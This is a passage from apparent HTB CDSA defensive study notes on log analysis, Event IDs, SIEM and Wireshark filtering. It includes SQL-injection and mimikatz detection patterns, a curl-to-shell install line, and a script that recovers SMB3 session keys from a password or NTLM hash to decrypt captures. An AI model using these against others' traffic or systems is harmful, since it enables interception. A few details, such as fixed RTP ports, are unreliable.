Filtering for process hollowing events
 Get-WinEvent -Path <Path to Log> -FilterXPath
 '*/System/EventID=8'
Investigating IIS logs
Importing the cmdlet
 PS C:\> add-pssnapin WebAdministration
 PS C:\> Import-Module WebAdministration
Auditing website info
 PS C:\> Get-IISSite
Auditing the IIS logs file location
 PS C:\> (Get-WebConfigurationProperty
 '/system.applicationHost/sites/siteDefaults' -
 Name 'logfile.directory').Value
It's common practice to store the value of the log path in
a variable for ease of use in later commands. The path may
change according to your environment.

 PS C:\> $LogDirPath =
 "C:\inetpub\logs\LogFiles\srvname"

Viewing the logs

 PS C:\> Get-Content $LogDirPath\*.log |%{$_ -
 replace '#Fields: ', ''}|?{$_ -notmatch '^#'}|
 ConvertFrom-Csv -Delimiter ' '
If there is a specific log file from which you want to
extract logs, use the below command
 PS C:\> Get-Content iis.log |%{$_ -
 replace '#Fields: ', ''}|?{$_ -notmatch '^#'}|
 ConvertFrom-Csv -Delimiter ' '
Extracting an IP pattern
 PS C:\> Select-String -Path $LogDirPath\*.log
 -Pattern '192.168.*.*'
Hunting SQL Injection Patterns
 PS C:\> Select-String -Path $LogDirPath\*.log '(@@version)|(sqlmap)|(Connect\(\))|(cast\()|(char\()|(bchar\()|(sys databases)|(\(select)|(convert\()|(Connect\()|(count\()|(sys objects)'
Investigating Windows Event Logs
with Timeline explorer
Timeline Explorer      is a log analysis program with a
graphical user interface. Log files need to be in CSV
format and can be imported for analysis.
To convert an audit trail exported from Windows event
logs to CSV, apply the below command

 .\EvtxECmd.exe -f
 'C:\Users\user\Desktop\sysmon.evtx' --csv
 'C:\Users\user\Desktop\' --csvf sysmon.csv

The above command uses    EvtxECmd.exe     to perform the
conversion.
The below figure shows the logs after importing them to
Timeline Explorer
We can use the search bar on the upper right to search
the logs for any string.
Investigating Windows Event Logs
with Sysmon View
SysmonView is a Windows GUI-based tool that visualises
Sysmon Logs.
Before using this tool, we must export the log file's
contents into XML via Event Viewer.
Once the XML file is created, import it into SysmonView:
     Go to   File > Import Sysmon Event Logs then
     choose the XML files generated using the Event
     Viewer.
     Once loaded, the left sidebar has search functionality
     that can filter a specific process in mind.
     Choose the image path and session GUID to render the
     mapped view.
     As shown below with green highlighter, you can
     search or select the executable you want to
     investigate.
Investigating Windows Event Logs
with Python-evtx tools
If you are on a Linux workstation, this method may work
best for you.
Installing Dependencies
First we install the suite of tools using the below command
 sudo apt install python3-evtx
Next we will download and install         cargo     because we will
need it to build the     chainsaw      tool

 curl https://sh.rustup.rs -sSf | sh
Follow the prompts to complete the installation.
Then we will clone the   chainsaw             repo from github
 git clone
 https://github.com/WithSecureLabs/chainsaw.git
And then we build it using the below command

 cargo build --release
Once the build has finished, you will find a copy of the
compiled binary in the target/release folder.
Running
We can get started by running              evtx_dump.py    against any
of the event files
 evtx_dump.py 'Windows Powershell.evtx' >
 output.txt
This will create a text file containing all Powershell
events.
We can then use   chainsaw      to search for specific
artefacts such as hashes, IPs or even strings
 ./chainsaw search mimikatz -i
 evtx_attack_samples/
Windows Event IDs
Security
Group policy modification
     Event ID 4719
     Event ID 4739
     User created or added
     Event ID 4720
     User failed to authenticate
     Event ID 4625
     Account logon
     Event ID 4624
     Account logoff
     Event ID 4634
     Process creation
     Event ID 4688
     Execution blocked due to restrictive policy
     Event ID 4100
     Member added to a universal security group
     Event ID 4756
     Member removed from a universal security group
     Event ID 4757
     Member added to a global security group
     Event ID 4728
     Member removed from a global security group
     Event ID 4729
Pass The Hash
Passing the hash will generate two Event ID 4776 entries
on the Domain Controller: the first event 4776 is
generated during the authentication of the victim
computer; the second event 4776 indicates the validation
of the account from the originating computer (infected
host) when accessing the target workstation (victim).
Event ID 4776
Event ID 4624 with a Logon Process of NtLmSSP
and/or an Authentication Package of NTLM.
Account Lockout
Event ID 4625 and/or Event ID 4740.
Windows Security audit log was cleared
Event ID 1102
Log file was cleared
Event ID 104
Windows Event Log service was shut down
Event ID 1100
Powershell script block execution
Event ID 4104
Powershell command invocation
     Event ID 4103
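As a quick-reference aid, the mapping above can be wrapped in a small shell helper. This is purely illustrative (function name is our own; only a subset of the IDs listed is covered):

```shell
# Map a Windows Security Event ID to its meaning (subset of the list above)
event_lookup() {
  case "$1" in
    4624) echo "Account logon" ;;
    4625) echo "Failed logon attempt" ;;
    4634) echo "Account logoff" ;;
    4688) echo "Process creation" ;;
    4720) echo "User created or added" ;;
    1102) echo "Security audit log cleared" ;;
    *)    echo "Unknown Event ID" ;;
  esac
}
event_lookup 1102   # prints: Security audit log cleared
```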
Sysmon Events
Event ID 1: Process Creation
Event ID 5: Process Terminated
Event ID 3: Network Connection
Event ID 7: Image Loaded
Event ID 8: CreateRemoteThread [Persistence operations -
process migration]
Event ID 11: File Created
Event ID 12 / 13 / 14: Registry Event
Event ID 15: FileCreateStreamHash
Event ID 22: DNS Event
Note that the following IDs come from the Windows
Security and PowerShell logs rather than Sysmon, but are
often reviewed alongside Sysmon data:
Event ID 4720: New user created
Event ID 4103: PowerShell module logging
Event ID 4732: A member was added to a group
Event ID 4624: Account logon (look for NTLM logons when hunting Pass The Hash)
Linux Log Analysis
/var/log/syslog
The syslog file stores all system activity,
including startup activity. Note that this is not the syslog
protocol used to collect log entries from other systems.
/var/log/messages
This log contains a wide variety of general
system messages. It includes some messages logged
during startup, some messages related to mail, the
kernel, and messages related to authentication.
/var/log/boot.log
This log includes entries created when the
system boots.
/var/log/auth.log
The authentication log contains information
related to successful and unsuccessful logins in addition
to the commands executed after a session is opened due
to successful authentication.
On Debian/Ubuntu systems, this log is stored
at   /var/log/auth.log ,     while on RedHat/CentOS
systems, it is located at   /var/log/secure .
/var/log/wtmp
History of login and logout activities.
     1. /var/run/utmp: Tracks currently logged-in users.
     2. /var/log/wtmp: Maintains a historical record of
        login and logout events.
     3. /var/log/btmp: Logs unsuccessful login attempts.
To examine a wtmp file independently,
the   utmpdump   utility can be used. It is included in
the   util-linux   package, which can be installed
via   sudo apt install util-linux .
/var/log/faillog
This log contains information on failed login
attempts. It can be viewed using the faillog
command.
/var/log/kern.log
The kernel log contains information logged
by the system kernel, which is the central part of
the Linux operating system.
/var/log/httpd/
If the system is configured as an Apache web
server, you can view access and error logs within
this directory.
      Web Servers:
    Nginx:
           Access
           Logs:     /var/log/nginx/access.log
           Error   Logs: /var/log/nginx/error.log
    Apache:
           Access
           Logs:    /var/log/apache2/access.log
           Error
           Logs:    /var/log/apache2/error.log
Databases:
    MySQL:
           Error Logs:    /var/log/mysql/error.log
    PostgreSQL:
           Error and Activity
           Logs: /var/log/postgresql/postgresql
           -{version}-main.log
Web Applications:
    PHP:
           Error Logs:    /var/log/php/error.log
Operating Systems:
    Linux:
           General System Logs:       /var/log/syslog
           Authentication Logs:      /var/log/auth.log
Firewalls and IDS/IPS:
    iptables:
           Firewall Logs:        /var/log/iptables.log
    Snort:
           Snort Logs:     /var/log/snort/
Manual Analysis
Auditing authentication logs
tail /var/log/auth.log
grep -i "fail" /var/log/auth.log
Listing stats about services used in
authentication
cat auth.log | cut -d' ' -f6 | cut -d'[' -f1 |
sort | uniq -c | sort -n
Auditing User login logs in Ubuntu
tail /var/
Auditing samba activity
grep -i samba /var/log/syslog
Auditing cron job logs
grep -i cron /var/log/syslog
Auditing sudo logs
grep -i sudo /var/log/auth.log
Filtering 404 logs in Apache
grep 404 apache-logs.log | grep -v -E
"favicon\.ico|robots\.txt"
Auditing files requested in Apache
head access_log | awk '{print $7}'
View root user command history
# cat /root/.*history
View last logins
last
Viewing SSH authentication logs
cat auth.log | grep sshd | less
Viewing stats about failed login
attempts sorted by user
 cat auth.log | grep Failed | cut -d: -f4 | cut
 -d' ' -f5- | rev | cut -d' ' -f6- | rev | sort
 | uniq -c | sort -n
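To see what this kind of pipeline produces, here is a self-contained demo against fabricated sshd failure lines (usernames, IPs and the field position are illustrative and depend on your log layout):

```shell
# Fabricated auth.log lines to exercise a per-user failure count
cat > /tmp/demo_auth.log <<'EOF'
Apr 10 10:00:01 host sshd[101]: Failed password for root from 10.0.0.9 port 40000 ssh2
Apr 10 10:00:05 host sshd[102]: Failed password for admin from 10.0.0.9 port 40001 ssh2
Apr 10 10:00:09 host sshd[103]: Failed password for root from 10.0.0.9 port 40002 ssh2
EOF
# Count failures per user name (field 9 in this log layout)
grep Failed /tmp/demo_auth.log | awk '{print $9}' | sort | uniq -c | sort -rn
```

The highest counts bubble to the top, which is usually where brute-force activity shows itself.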
Viewing successful authentication logs
 cat auth.log | grep Accepted
View login history from the wtmp file
 utmpdump /var/log/wtmp
Manual Log Analysis with
ULogViewer
ULogViewer can be used to analyze the following types of
log files:
   1. Apache Access Log Files: Only Apache access log
      analysis.
   2. Linux System Log Files: Only Linux system log
      analysis.
   3. Raw Text In File: Cleartext log analysis.
   4. Windows Event Log Files: Only Windows log
      analysis.
Typical workflow in the UI:
   1. Select the log profile to be parsed.
   2. Add the log file to be parsed.
   3. Filter logs and perform searches.
   4. Delete the loaded logs from the UI.
   5. Open a new tab for a different log source.
Network Logs
Network logs record traffic on the network. These logs
are on a variety of devices such as routers, firewalls,
web servers, and network intrusion
detection/prevention systems. You can typically
manipulate these devices to log specific information, such
as logging all traffic that the device passes, all traffic
that the device blocks, or both. These logs are useful
when troubleshooting connectivity issues and when
identifying potential
intrusions or attacks.
Logs Centralization
SIEM
Definition
A security information and event management (SIEM)
system provides a centralized solution for collecting,
analyzing, and managing data from multiple sources.
How it works
     The SIEM collects log data from devices
     throughout the network and stores these logs in a
     searchable database. Log entries come from various
     sources, such as firewalls, routers, network
     intrusion detection and prevention systems, and
     more. They can also come from any system that an
     organization wants to monitor, such as web servers,
     proxy servers, and database servers.
     The SIEM system collects data from multiple
     systems, and these systems typically format log
     entries differently. However, the SIEM system can
     aggregate the data and store it so that it is easy to
     analyze and search. A SIEM uses a correlation
     engine, a software component that collects and
     analyzes event log data from various systems within
     the network.
     A SIEM typically comes with predefined alerts, which
     can provide continuous monitoring of systems and
     provide notifications of suspicious events. For
     example, if it detects a port scan on a server, it
     might send an email to an administrator group or
     display the alert on a heads-up display. SIEMs also
     include the ability to create new alerts.
     SIEMs also include automated triggers. Triggers
     cause an action in response to a predefined number
     of repeated events. As an example, imagine a trigger
     for failed logons is set at five. If an attacker
     repeatedly tries to log on to a server using Secure
     Shell (SSH), the server’s log will show the failed
     logon attempts. When the SIEM detects more than
     five failed SSH logons, it can change the environment
     and stop the attack. It might modify a firewall to
     block these SSH logon attempts or send a script to
     the server to temporarily disable SSH. A SIEM
     includes the ability to modify predefined triggers and
     create new ones.
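The trigger logic described above can be sketched in a few lines of shell. This is a toy illustration of the threshold idea, not a real SIEM rule; the log format, field position and five-failure threshold are assumptions:

```shell
# Toy threshold trigger: alert on any source IP with more than 5
# failed SSH logins (fabricated auth.log data)
cat > /tmp/siem_demo.log <<'EOF'
Apr 10 09:00:01 host sshd[1]: Failed password for root from 10.0.0.5 port 1 ssh2
Apr 10 09:00:02 host sshd[2]: Failed password for root from 10.0.0.5 port 2 ssh2
Apr 10 09:00:03 host sshd[3]: Failed password for root from 10.0.0.5 port 3 ssh2
Apr 10 09:00:04 host sshd[4]: Failed password for root from 10.0.0.5 port 4 ssh2
Apr 10 09:00:05 host sshd[5]: Failed password for root from 10.0.0.5 port 5 ssh2
Apr 10 09:00:06 host sshd[6]: Failed password for root from 10.0.0.5 port 6 ssh2
Apr 10 09:00:07 host sshd[7]: Failed password for root from 10.0.0.7 port 7 ssh2
EOF
# Field 11 is the source IP in this layout; count and compare to threshold
awk '/Failed password/ { count[$11]++ }
     END { for (ip in count) if (count[ip] > 5)
             print "ALERT:", ip, count[ip], "failed logins" }' /tmp/siem_demo.log
```

A real SIEM would additionally window the events in time and fire a response action (firewall rule, script, notification) instead of just printing.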
Syslog Protocol
Definition
The syslog protocol specifies a general log entry format
and the details on how to transport log entries. You can
deploy a centralized syslog server
to collect syslog entries from a variety of devices in the
network, similar to how a SIEM server collects log
entries.
How it works
Any systems sending syslog messages are originators.
They send syslog log entries to a collector (a syslog
server). The collector can receive messages from external
devices or services and applications on the same system.
For example, Linux systems include the   syslogd
daemon, which is the service that handles syslog
messages. It collects the entries and processes them
based on entries in the   /etc/syslog.conf   file. Many
syslog messages are routed to the   /var/log/syslog   file.
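For illustration, a few routing rules in the syslog.conf/rsyslog style are shown below. The first three lines resemble Debian defaults; the forwarding line uses an assumed collector host name:

```
# Route auth messages to their own file
auth,authpriv.*            /var/log/auth.log
# Everything else (minus auth) to the general log ("-" = async writes)
*.*;auth,authpriv.none     -/var/log/syslog
kern.*                     -/var/log/kern.log
# Forward all messages to a central collector ("@@" = TCP, "@" = UDP)
*.* @@loghost.example.com:514
```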
Syslog Software Tools For Linux
#Syslog-ng
Syslog-ng extends syslogd, allowing a system to
collect logs from any source. It also includes correlation
and routing abilities to route log entries to any log
analysis tool. It provides rich filtering capabilities,
content-based filtering, and
can be extended with tools and modules written in other
languages. It supports TCP and TLS.
#Rsyslog
Rsyslog came out later as an improvement over
syslog-ng. One significant change is the ability to send log
entries directly into database engines. It also supports
TCP and TLS.
Syslog Software Tools For Windows
#NXLog
NXLog functions as a log collector, and it can integrate
with most SIEM systems.
Module 4: Network Traffic
Analysis
Basics
Packet Capturing
Packet capture refers to capturing network packets
transmitted over a network, and packet replay refers to
sending packets back out over the
network. You can capture packets using a protocol
analyzer, which is sometimes called sniffing or using a
sniffer.
Promiscuous Mode
When using a protocol analyzer, you need to configure the
network interface card (NIC) on the system to use
promiscuous mode. Normally, a NIC uses non-promiscuous
mode, and only processes packets addressed directly to
its IP address. However, when you put it in promiscuous
mode, it processes all packets regardless of the IP
address. This allows the protocol analyzer to capture all
packets that reach the NIC.
Traffic Analysis
Traffic Analysis is a method of intercepting,
recording/monitoring, and analyzing network data and
communication patterns to detect and respond to system
health issues, network anomalies, and threats. The
network is a rich data source, so traffic analysis is useful
for security and operational matters. The operational
issues cover system availability checks and measuring
performance, and the security issues cover anomaly and
suspicious activity detection on the network.
Note
The common best practice is handling medium-sized pcaps
with Wireshark, creating logs and correlating events
with Zeek, and processing multiple logs in Brim.
Wireshark
Definition
Wireshark is an open-source, cross-platform network
packet analyzer tool capable of sniffing and investigating
live traffic and inspecting packet captures (PCAP). It is
commonly used as one of the best packet analysis tools.
Dashboard
Toolbar
The main toolbar contains multiple menus and shortcuts
for packet sniffing and processing, including filtering,
sorting, summarizing, exporting and merging.
Display Filter
The main query and filtering section.
Capture Filter and Interfaces
Capture filters and available sniffing points (network
interfaces). The network interface is the connection
point between a computer and a network. The software
connection (e.g., lo, eth0 and ens33) enables networking
hardware.
Loading PCAP Files For Analysis
You can load a PCAP either from the file menu or from the
recent files section if you have analyzed it before.
Below we can see the processed filename, detailed
number of packets and packet details. Packet details are
shown in three different panes, which allow us to
discover them in different formats.
Packet Details Pane
Detailed protocol breakdown of the selected packet.
Packet Bytes Pane
Hex and decoded ASCII representation of the selected
packet. It highlights the packet field depending on the
clicked section in the details pane.
Sniffing Packets
You can use the blue "shark button" to start network
sniffing (capturing traffic), the red button will stop the
sniffing, and the green button will restart the sniffing
process. The status bar will also provide the used sniffing
interface and the number of collected packets.
Capture File Details
You can view the details by following "Statistics -->
Capture File Properties" or by clicking the "pcap icon
located on the left bottom" of the window.
Packet Dissection
When you click on a specific packet, you can view the
protocol and packet dissection in the details pane.
The Frame (Layer 1): This will show you what
frame/packet you are looking at and details specific to the
Physical layer of the OSI model.
Source [MAC] (Layer 2): This will show you the source
and destination MAC Addresses; from the Data Link layer
of the OSI model.
Source [IP] (Layer 3): This will show you the source and
destination IPv4 Addresses; from the Network layer of the
OSI model.
Protocol (Layer 4): This will show you details of the
protocol used (UDP/TCP) and source and destination ports;
from the Transport layer of the OSI model.
Protocol Errors: This continuation of the 4th layer shows
specific segments from TCP that needed to be
reassembled.
Application Protocol (Layer 5): This will show details
specific to the protocol used, such as HTTP, FTP, and
SMB. From the Application layer of the OSI model.
Application Data: This extension of the 5th layer can
show the application-specific data.
Finding and Navigating Through Packets
Packet numbers help to count the total number of
packets and make it easier to find/investigate specific
packets. You can use the "Go" menu and toolbar to view
specific packets.
Apart from packet number, Wireshark can find packets by
packet content. You can use the "Edit --> Find
Packet" menu to make a search inside the packets for a
particular event of interest. This helps analysts and
administrators to find specific intrusion patterns or failure
traces.
As shown below, there are two crucial points in finding
packets. The first is knowing the input type. This
functionality accepts four types of inputs (Display filter,
Hex, String and Regex). String and regex searches are the
most commonly used search types. Searches are case
insensitive, but you can set the case sensitivity in your
search by clicking the radio button.
The second point is choosing the search field. You can
conduct searches in the three panes (packet list, packet
details, and packet bytes), and it is important to know
the available information in each pane to find the event of
interest. For example, if you try to find the information
available in the packet details pane and conduct the
search in the packet list pane, Wireshark won't find it
even if it exists.
Filter Types
Apply as Filter
This is the most basic way of filtering traffic. While
investigating a capture file, you can click on the field you
want to filter and use the "right-click menu"
or "Analyse --> Apply as Filter" menu to filter the
specific value. Once you apply the filter, Wireshark will
generate the required filter query, apply it, show the
packets according to your choice, and hide the unselected
packets from the packet list pane. Note that the number
of total and displayed packets are always shown on the
status bar.
Conversation filter
Use this filter if you want to investigate a specific packet
number and all linked packets by focusing on IP addresses
and port numbers.
Prepare as Filter
Similar to "Apply as Filter", this option helps analysts
create display filters using the "right-click" menu.
However, unlike the previous one, this model doesn't
apply the filters after the choice. It adds the required
query to the pane and waits for the execution command
(enter) or another chosen filtering option by using the "..
and/or.." from the "right-click menu".
Follow Stream
Streams help analysts recreate the application-level data
and understand the event of interest. It is also possible to
view the unencrypted protocol data like usernames,
passwords and other transferred data.
Example Display Filters
Generally speaking, when creating display filters remember
that they follow the below rules:
     Packet filters are defined in lowercase.
     Packet filters have an autocomplete feature to break
     down protocol details, and each detail is represented
     by a "dot".
     Packet filters have a three-colour representation:
     green indicates a valid filter, red indicates an
     invalid filter, and yellow indicates a warning (the
     filter may work but can be unreliable).
show packets containing the below IP
 ip.addr == 192.168.1.1
show packets not containing the below ip
 !(ip.addr == 192.168.1.1)
show packets containing both below IPs
 ip.addr == 192.168.1.1 && ip.addr ==
 192.168.1.2
Show all packets containing IP addresses from
10.10.10.0/24 subnet
 ip.addr == 10.10.10.0/24
Show all packets originated from 10.10.10.111
 ip.src == 10.10.10.111
Show all TCP packets with port 80
 tcp.port == 80
Show all TCP packets originating from port 1234
 tcp.srcport == 1234
show http packets
 http
show https packets
 tcp.port == 443
Show all packets with HTTP response code "200"
 http.response.code == 200
Show all HTTP GET requests
 http.request.method == "GET"
show email packets
 smtp
Show smtp status codes
 smtp.response.code
show DNS packets
 dns
Show all DNS requests
 dns.flags.response == 0
And you can replace 0 with 1 to show DNS responses.
TCP ports filters
 tcp.port
 tcp.dstport
 tcp.srcport
UDP ports filters
 udp.port
 udp.dstport
 udp.srcport
Filter DNS query types records
DNS A record
 dns.qry.type == 1
DNS TXT record
 dns.qry.type == 16
Filtering for http methods
[GET]
 http.request.method == "GET"
[POST]
 http.request.method == "POST"
Show packets between time range
Say you want to find http traffic between Dec 08, 2021
11:03:00 and Dec 08, 2021 11:24:00; then the below filter
is used
 http and (frame.time >= "Dec 08, 2021
 11:03:00") && (frame.time <= "Dec 08, 2021
 11:24:00")
Finding domain names in https/ssl packets
First we filter for https/ssl traffic
 tcp.port == 443
Then we look for packets where the info section contains
[client hello] then follow [TCP stream].
Filtering USB Keyboard Packets
 usb.transfer_type == 0x01 and frame.len == 35
 and !(usb.capdata == 00:00:00:00:00:00:00:00)
Filter to detect WIFI DDOS
 wlan.fc.type_subtype == 0x00a ||
 wlan.fc.type_subtype == 0x00c
Data Extraction and Statistics
You can use the "File" menu to export packets.
Show the number of packets for a specific protocol such
as http
From wireshark menu >> statistics >> protocol hierarchy
>> note the packets field that indicates the number and
the corresponding protocol.
Exporting images and files transferred through HTTP
 Select File -> Export Objects -> HTTP
Selecting specific packet number
 Go -> Go to Packet
OR
 frame.number == 99
Extracting source or destination ip addresses from a
pcap
 tshark -T json -e 'ip.src' -e 'ip.dst' -r
 filename.pcap | grep '\.[0-9]' | sort -u
Or you can follow the below order from Wireshark menu
Statistics >> Conversation >> IPV4 field
Statistics
In the statistics menu, we can narrow the focus on the
scope of the traffic, available protocols, endpoints and
conversations, and some protocol-specific details
like DHCP, DNS and HTTP/2.
Resolved Addresses
This option helps analysts identify IP addresses
and DNS names available in the capture file by providing
the list of the resolved addresses and their hostnames.
Protocol Hierarchy
This option breaks down all available protocols from the
capture file and helps analysts view the protocols in a
tree view based on packet counters and percentages.
Thus analysts can view the overall usage of the ports and
services and focus on the event of interest.
Conversations
Conversation represents traffic between two specific
endpoints. This option provides the list of the
conversations in five base formats; ethernet, IPv4,
IPv6, TCP and UDP. Thus analysts can identify all
conversations and contact endpoints for the event of
interest.
DNS
This option breaks down all DNS packets from the capture
file and helps analysts view the findings in a tree view
based on packet counters and percentages of the DNS
protocol. Thus analysts can view the DNS service's overall
usage, including rcode, opcode, class, query type,
service and query stats and use it for the event of
interest.
HTTP
This option breaks down all HTTP packets from the
capture file and helps analysts view the findings in a tree
view based on packet counters and percentages of the
HTTP protocol. Thus analysts can view the HTTP service's
overall usage, including request and response codes and
the original requests.
Creating Filter Bookmarks
We can create filters and save them as bookmarks and
buttons for later usage. The filter toolbar has a filter
bookmark section to save user-created filters, which
helps analysts re-use favourite/complex filters with a
couple of clicks. Similar to bookmarks, you can create
filter buttons ready to apply with a single click.
                            284 / 547
HTB CDSA
285 / 547
                         HTB CDSA
Comparison Operators
[1]
 eq   OR   ==
 ne   OR   !=
 gt   OR   >
 lt   OR   <
 ge   OR   >=
 le   OR   <=
[2]
 "contains" : Search a value inside packets. It
 is case-sensitive and provides similar
 functionality to the "Find" option by focusing
 on a specific field.
Example: List all HTTP packets where packets' "server"
field contains the "Apache" keyword.
 http.server contains "Apache"
[3]
 "matches" : Search a pattern of a regular
 expression. It is case insensitive, and
 complex queries have a margin of error.
Example: List all HTTP packets where packets' "host"
fields match keywords ".php" or ".html".
 http.host matches "\.(php|html)"
[4]
 "in": Search a value or field inside of a
 specific scope/range.
Example:List all TCP packets where packets' "port" fields
have values 80, 443 or 8080.
 tcp.port in {80 443 8080}
[5]
 "upper": Convert a string value to uppercase.
Example:Convert all HTTP packets' "server" fields to
uppercase and list packets that contain the "APACHE"
keyword.
 upper(http.server) contains "APACHE"
[6]
 "lower":Convert a string value to lowercase.
Example: Convert all HTTP packets' "server" fields info to
lowercase and list packets that contain the "apache"
keyword.
 lower(http.server) contains "apache"
[7]
 "string" : Convert a non-string value to a
 string.
Example: Convert all "frame number" fields to string
values, and list frames whose numbers end with an odd digit.
 string(frame.number) matches "[13579]$"
And for even numbers use the below
 string(frame.number) matches "[02468]$"
Logical Operators
 and OR   &&
 or OR    ||
 xor OR   ^^
 not OR   !
Practical Scenarios
Decrypting SSL traffic
Wireshark can't decrypt encrypted traffic by default, so
we need to supply decryption material if we have it. Most
commonly, for SSL/TLS we will need to provide the
pre-master secret.
If you are already inspecting encrypted traffic look for
[CLIENT_RANDOM] and see if you can find its value. Once
found, save it in a [.txt] file and load it as the
pre-master secret log file as shown below
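One common way to obtain this key material in the first place is the SSLKEYLOGFILE mechanism honoured by major browsers and by curl when built against OpenSSL. A sketch (the target URL is a placeholder, and whether keys are written depends on the client's TLS library):

```shell
# Ask supporting TLS clients to append CLIENT_RANDOM lines to a key log
export SSLKEYLOGFILE=/tmp/tls_keys.txt
# Any supporting client launched from this shell will now log its
# session secrets (network access required; failure tolerated here)
curl -s https://example.com >/dev/null 2>&1 || true
# Load the resulting file in Wireshark under
# Preferences -> Protocols -> TLS -> (Pre)-Master-Secret log filename
```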
Extracting RTP Audio Files
RTP communications normally operate over UDP port [1313]
or [51393]. We can create a filter to display packets with
these ports
 udp.port == 1313 or udp.port == 51393
After displaying RTP packets, we can right click on the
packet and select [Decode as RTP]
Then from the menu we follow as below
Select [RTP Streams] will bring up the below menu
Then you can select the stream and select [Analyze] you
will be able to play the Audio.
Decrypting SMB3 Traffic
Encrypted SMB traffic can be spotted with a pattern such
as the one shown below:
In order to decrypt these packets, we will need the
following information:
 -   The username that logged in to the SMB share
 -   Domain name
 -   NTProofStr
 -   Session Key
 -   Random Encrypted Session Key
 -   User’s password or NTLM hash
To extract most of the above information, we will need to
locate the packets that show successful SMB
authentication; therefore, we can use the filter below:
 smb2.cmd == 0x01
Below is an example showing two users authenticating:
To find other details, we have to drill down on the above
packets and locate the other details mentioned above.
The next step is to use the below Python script to recover
the   Random Session Key .
The script accepts the username, domain, password,
encrypted session key and NTProofStr as input arguments:
 import hashlib
 import hmac
 import argparse

 # Stolen from impacket. Thank you all for your
 # wonderful contributions to the community
 try:
     from Cryptodome.Cipher import ARC4
     from Cryptodome.Cipher import DES
     from Cryptodome.Hash import MD4
 except Exception:
     print("Warning: You don't have any crypto installed. You need pycryptodomex")
     print("See https://pypi.org/project/pycryptodomex/")

 def generateEncryptedSessionKey(keyExchangeKey, exportedSessionKey):
     cipher = ARC4.new(keyExchangeKey)
     cipher_encrypt = cipher.encrypt
     sessionKey = cipher_encrypt(exportedSessionKey)
     return sessionKey

 parser = argparse.ArgumentParser(description="Calculate the Random Session "
                                  "Key based on data from a PCAP (maybe).")
 parser.add_argument("-u", "--user", required=True, help="User name")
 parser.add_argument("-d", "--domain", required=True, help="Domain name")
 parser.add_argument("-p", "--password", required=True, help="Password of User")
 parser.add_argument("-n", "--ntproofstr", required=True,
                     help="NTProofStr. This can be found in PCAP (provide Hex Stream)")
 parser.add_argument("-k", "--key", required=True,
                     help="Encrypted Session Key. This can be found in PCAP (provide Hex Stream)")
 parser.add_argument("-v", "--verbose", action="store_true",
                     help="increase output verbosity")
 args = parser.parse_args()

 # Upper Case User and Domain
 user = str(args.user).upper().encode('utf-16le')
 domain = str(args.domain).upper().encode('utf-16le')

 # Create 'NTLM' Hash of password
 passw = args.password.encode('utf-16le')
 hash1 = hashlib.new('md4', passw)
 password = hash1.digest()

 # Calculate the ResponseNTKey
 h = hmac.new(password, digestmod=hashlib.md5)
 h.update(user + domain)
 respNTKey = h.digest()

 # Use NTProofStr and ResponseNTKey to calculate Key Exchange Key
 NTproofStr = bytes.fromhex(args.ntproofstr)
 h = hmac.new(respNTKey, digestmod=hashlib.md5)
 h.update(NTproofStr)
 KeyExchKey = h.digest()

 # Calculate the Random Session Key by decrypting the
 # Encrypted Session Key with the Key Exchange Key via RC4
 RsessKey = generateEncryptedSessionKey(KeyExchKey, bytes.fromhex(args.key))

 if args.verbose:
     print("USER WORK: " + user.decode('utf-16le') + " " + domain.decode('utf-16le'))
     print("PASS HASH: " + password.hex())
     print("RESP NT:   " + respNTKey.hex())
     print("NT PROOF:  " + NTproofStr.hex())
     print("KeyExKey:  " + KeyExchKey.hex())
 print("Random SK: " + RsessKey.hex())
You can also tweak this script to accept the user NT hash
instead of the password in case you don't have it.
 import hashlib
 import hmac
 import argparse

 # Stolen from impacket. Thank you all for your
 # wonderful contributions to the community
 try:
     from Cryptodome.Cipher import ARC4
     from Cryptodome.Cipher import DES
     from Cryptodome.Hash import MD4
 except Exception:
     print("Warning: You don't have any crypto installed. You need pycryptodomex")
     print("See https://pypi.org/project/pycryptodomex/")

 def generateEncryptedSessionKey(keyExchangeKey, exportedSessionKey):
     cipher = ARC4.new(keyExchangeKey)
     cipher_encrypt = cipher.encrypt
     sessionKey = cipher_encrypt(exportedSessionKey)
     return sessionKey

 parser = argparse.ArgumentParser(description="Calculate the Random Session "
                                  "Key based on data from a PCAP (maybe).")
 parser.add_argument("-u", "--user", required=True, help="User name")
 parser.add_argument("-d", "--domain", required=True, help="Domain name")
 parser.add_argument("-n", "--ntproofstr", required=True,
                     help="NTProofStr. This can be found in PCAP (provide Hex Stream)")
 parser.add_argument("-k", "--key", required=True,
                     help="Encrypted Session Key. This can be found in PCAP (provide Hex Stream)")
 parser.add_argument("--ntlmhash", required=True,
                     help="NTLM hash of the User's password (provide Hex Stream)")
 parser.add_argument("-v", "--verbose", action="store_true",
                     help="increase output verbosity")
 args = parser.parse_args()

 # Upper Case User and Domain
 user = str(args.user).upper().encode('utf-16le')
 domain = str(args.domain).upper().encode('utf-16le')

 # Use provided NTLM hash directly
 password = bytes.fromhex(args.ntlmhash)

 # Calculate the ResponseNTKey
 h = hmac.new(password, digestmod=hashlib.md5)
 h.update(user + domain)
 respNTKey = h.digest()

 # Use NTProofStr and ResponseNTKey to calculate Key Exchange Key
 NTproofStr = bytes.fromhex(args.ntproofstr)
 h = hmac.new(respNTKey, digestmod=hashlib.md5)
 h.update(NTproofStr)
 KeyExchKey = h.digest()

 # Calculate the Random Session Key by decrypting the
 # Encrypted Session Key with the Key Exchange Key via RC4
 RsessKey = generateEncryptedSessionKey(KeyExchKey, bytes.fromhex(args.key))

 if args.verbose:
     print("USER WORK: " + user.decode('utf-16le') + " " + domain.decode('utf-16le'))
     print("NTLM HASH: " + password.hex())
     print("RESP NT:   " + respNTKey.hex())
     print("NT PROOF:  " + NTproofStr.hex())
     print("KeyExKey:  " + KeyExchKey.hex())
 print("Random SK: " + RsessKey.hex())
Next we run the script:
 python3 script.py -u admin -d domain -n ntproofstr -k encrypted-session-key --ntlmhash ntlm-hash
The output of the above script will be the   Random
Session Key   which can now be used to decrypt the SMB
packets.
Head over to   Edit-->Preferences--->Protocols---
>SMB2   and click on the plus sign to add the values:
Then again head over to   File-->Export Objects-->SMB
and you will extract any file(s) that have been exchanged
during the SMB session.
Detecting TCP connect scans / NMAP scans
We use the below filter
 tcp.flags.syn==1 and tcp.flags.ack==0 and
 tcp.window_size > 1024
tcp.flags.syn == 1 : indicates a TCP SYN flag     set.
tcp.flags.ack : indicates a TCP ACK flag set.
TCP connect scans usually have a window size larger
than 1024 bytes, as the client completes the handshake
and expects to receive data.
Detecting TCP SYN scans / NMAP scans
